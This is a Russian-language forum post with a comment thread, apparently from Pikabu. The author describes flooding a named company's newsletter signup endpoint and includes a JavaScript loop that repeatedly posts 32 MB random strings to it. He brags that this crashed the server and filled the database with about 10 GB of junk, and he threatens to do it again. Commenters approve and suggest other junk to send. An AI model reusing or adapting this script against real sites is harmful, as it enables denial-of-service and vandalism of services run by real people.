7244

Шлём `Привет` кэшбери

Вижу пост

Не долго парясь нахожу в интернете их сайт http://gdc.group


Ооокей... Смотрим что там и как. И оказывается что фильтр почты, которую к ним на рассылку можно закинуть - фиктивный. Те если отправить руками то можно записать что угодно.


http://gdc.group/files/action/ajax.php?email=1


Методом перебора узнаём что под поле почты выделено 32милиионов(2^25) символов строка... А это 32 мегабайта.


Пишем небольшой скрипт


i=0; spam = () => { $.post('http://gdc.group/files/action/ajax.php', { email: Array(2**25).fill().map(()=>{ return String.fromCodePoint(~~(Math.random(1, 255) * 255)) }).join('') }, (a)=>{console.log(++i, a); spam();}); }; spam();

Хотя на деле лучше степень 20 гдето, потому как на лимите там памяти не хватает.


Ну и итого всё..) Память у сервиса кончилась, удачи разрабам разгребать говно и фиксить дыры..)

Как минимум гигов на 10 в базу я поднасрать успел, пока память не закончилась... Если ребутнут не пофиксив, продолжим...


Такие успешные парни, а найти разраба не из студентов не смогли =\


Теперь всегда так:

Fatal error: Allowed memory size of 268435456 bytes exhausted (tried to allocate 4304128 bytes) in /home/bitrix/ext_www/gdc.group/files/action/ajax.php on line 8

Ещё и битрикс... Фи...

Вы смотрите срез комментариев. Показать все
11
Автор поста оценил этот комментарий
Как минимум гигов на 10 в базу я поднасрать успел, пока память не закончилась

Хороший тактический ход, в следующий раз надо залить им кототрапов.

Иллюстрация к комментарию
раскрыть ветку (11)
1
Автор поста оценил этот комментарий

Увы, там текстовые строки )

раскрыть ветку (10)
11
Автор поста оценил этот комментарий

Некотрапы в ASCII

раскрыть ветку (7)
4
Автор поста оценил этот комментарий

Понимаешь, когда это будут затирать - будут затирать либо всё что пришло с моих проксей, либо всё что длиннее 64 символов например ) Никто их не успеет рассмотреть кроме меня... А я не хочу)

0
Автор поста оценил этот комментарий

Это конечно не некотрапы, но кто там эти символы разберет : )

https://coub.com/view/1i69gm

раскрыть ветку (5)
0
Автор поста оценил этот комментарий

Тут какая-то отсылка к Евангелиону

раскрыть ветку (4)
3
Автор поста оценил этот комментарий

Это из клипа ME!ME!ME! ;)

раскрыть ветку (2)
2
Автор поста оценил этот комментарий

Знаю. Так-то весь мемеме - огромная отсылка к Евангелиону)

раскрыть ветку (1)
0
DELETED
Автор поста оценил этот комментарий

Весь мир отсылка к Еве!

Нихрена подобного, где там отсылка-то?

0
Автор поста оценил этот комментарий

А может к ЖоЖе? : )

2
Автор поста оценил этот комментарий
А base64?
Автор поста оценил этот комментарий

А прямой мыл, что-то типа abuse@, admin@, root@, webmaster@

и т.п.?

` ´

Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку